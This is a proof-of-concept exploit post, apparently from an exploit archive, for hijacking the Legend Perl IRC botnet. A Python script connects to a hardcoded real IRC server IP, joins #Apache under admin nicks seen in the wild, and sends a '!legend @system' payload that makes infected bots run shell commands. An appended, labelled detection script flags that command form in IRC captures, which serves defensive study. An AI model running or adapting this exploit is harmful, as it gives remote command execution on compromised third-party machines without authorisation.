Legend Perl IRC Bot Remote Code Execution Exploit
Source: @shipcod3 Author: JayTurla Published: 2015-04-28
#
# legend_rce.py
# Legend Perl IRC Bot Remote Code Execution PoC
# author: Jay Turla ( @shipcod3 )
# description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. 
# greetz to ROOTCON (rootcon.org) goons
#
  
import socket
import sys
  
def usage():
    print("USAGE: python legend_rce.py nick")
    print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")
       
def main(argv):
      
    if len(argv) < 2:
        return usage()
  
    #irc server connection settings
    botnick = sys.argv[1] #admin payload for taking over the Legend Bot
    server = "80.246.50.71" #irc server
    channel = "#Apache" #channel where the bot is located
  
    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
    print "connecting to:"+server
    irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
    irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
    irc.send("NICK "+ botnick +"\n") #sets nick
    irc.send("JOIN "+ channel +"\n") #join the chan
    irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot
  
    while 1:    #puts it in a loop
        text = irc.recv(2040)  # receive the text
        print text   #print text to console
  
        if text.find('PING') != -1:                          #check if 'PING' is found
            irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)
        if text.find('!quit') != -1: #quit the Bot
            irc.send("QUIT\r\n")
            sys.exit()
        if text.find('Linux') != -1:                         
            irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
            irc.send ("QUIT\r\n")
            sys.exit()
  
if __name__ == "__main__":
    main(sys.argv)
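
Detection-side companion to the PoC above, added here as an example and not part of the original post or of the bot's code: it parses raw IRC lines from a capture and flags any PRIVMSG carrying the `!legend @system` command form the PoC sends. The function names and the SAMPLE lines are constructed for illustration.

```python
import re

# Command form taken from the PoC on this page: !legend @system '<cmd>'
SYSTEM_CMD = re.compile(r"^!legend\s+@system\s+(?P<cmd>.+?)\s*$", re.IGNORECASE)

def parse_irc_line(line):
    """Split one raw IRC line into (prefix, command, params); None if empty."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    # The first " :" starts the trailing parameter, which may contain spaces.
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    params = parts[1:]
    if sep:
        params.append(trailing)
    return prefix, parts[0].upper(), params

def find_system_commands(lines):
    """Return one finding per PRIVMSG that carries the bot's @system command."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        parsed = parse_irc_line(raw)
        if parsed is None:
            continue
        prefix, command, params = parsed
        if command != "PRIVMSG" or len(params) < 2:
            continue
        match = SYSTEM_CMD.match(params[-1])
        if match:
            nick = prefix.split("!", 1)[0] if prefix else None
            findings.append({"line": lineno, "nick": nick, "target": params[0],
                             "shell_command": match.group("cmd").strip("'\"")})
    return findings

# Constructed sample capture (not real traffic); 192.0.2.x are documentation addresses.
SAMPLE = [
    ":irc.example.net 001 god :Welcome\r\n",
    "PING :irc.example.net\r\n",
    ":god!god@192.0.2.10 PRIVMSG #Apache :!legend @system 'uname -a' \r\n",
    ":bot1!u@192.0.2.20 PRIVMSG #Apache :Linux host 3.2.0 x86_64\r\n",
    ":alice!a@192.0.2.30 PRIVMSG #Apache :what does @system do?\r\n",
    "PRIVMSG #Apache :!legend @system 'id'\n",
]

if __name__ == "__main__":
    for finding in find_system_commands(SAMPLE):
        print(finding)
```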
  

 